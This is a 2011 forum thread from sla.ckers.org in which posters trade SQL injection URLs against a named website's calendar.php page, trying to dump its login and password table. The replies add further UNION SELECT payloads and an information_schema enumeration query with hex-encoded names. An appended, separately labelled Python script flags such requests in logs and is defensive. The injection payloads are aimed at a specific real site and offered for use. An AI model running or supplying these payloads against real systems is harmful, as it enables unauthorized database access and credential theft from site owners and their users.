Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
password and user in this site >>> Exploitation does not appear
Posted by: blackrose
Date: June 17, 2011 06:51AM

password and user in this site
Exploitation does not appear


http://www.trollhaugen.com/calendar.php?id=-79%20UNION%20SELECT%201,2,3,4,group_concat%28login,0x3a,password%29,6,7+from+test_sql.tblogin

What is the solution?

Re: password and user in this site >>> Exploitation does not appear
Posted by: 9hh2yj
Date: June 17, 2011 08:52PM

Well, there are no rows to display as shown by this:

http://www.trollhaugen.com/calendar.php?id=1%20UNION%20SELECT%201,2,3,4,5,count%28login%29,7%20FROM%20test_sql.tblogin

It seems like a privilege issue because you can fetch the rows from any of the tables in trollhaugen_08, like this:

http://www.trollhaugen.com/calendar.php?id=1%20UNION%20SELECT%201,2,3,4,5,count%28eventtitle%29,7%20FROM%20trollhaugen_08.tbl_calendar

That's about as far as I can help.

Re: password and user in this site >>> Exploitation does not appear
Posted by: sh3llm4n
Date: June 18, 2011 04:54AM

Hi.. you can try this...

id=-79 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(group_concat(column_name) as char))),0x27,0x7e) FROM information_schema.columns Where table_schema=0x746573745F73716C AND table_name=0x74626C6F67696E),0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--


but it hasn't any value in this table...

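Added example, not part of the original thread: a log-review sketch that flags requests of the shape posted above, where an integer `id` parameter carries SQL text. The sample request lines are constructed, and the assumption that `id` is always a non-negative integer, the signature names and the function names are all illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request targets (not real log data).
SAMPLE_REQUESTS = [
    "/calendar.php?id=79",
    "/calendar.php?id=-79%20UNION%20SELECT%201,2,3,4,5,6,7+from+other_db.some_table",
    "/calendar.php?id=1%20UNION%20ALL%20SELECT%200x31,2,3%20FROM%20information_schema.columns--",
    "/calendar.php?id=12&view=month",
]

# Assumption: these parameters only ever carry non-negative integers.
NUMERIC_PARAMS = {"id"}

# Secondary signatures, used to label what a rejected value contained.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
    "cross_schema_ref": re.compile(r"\bfrom\s+\w+\.\w+", re.I),
}


def inspect(request_target):
    """Return the sorted findings for one request target (path plus query)."""
    findings = set()
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:  # parse_qs has already decoded %xx and '+'
            if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
                findings.add("non_integer_" + name)
            for label, pattern in SIGNATURES.items():
                if pattern.search(value):
                    findings.add(label)
    return sorted(findings)


def scan(request_targets):
    """Map each flagged request target to its findings; clean ones are omitted."""
    report = {}
    for target in request_targets:
        findings = inspect(target)
        if findings:
            report[target] = findings
    return report


if __name__ == "__main__":
    for target, findings in scan(SAMPLE_REQUESTS).items():
        print(", ".join(findings), "<-", target)
```

The type check on `id` is the reliable signal here; the keyword signatures only describe what a rejected value contained, and the same integer check applied in the application, together with a parameterized query, stops the request before it reaches the database.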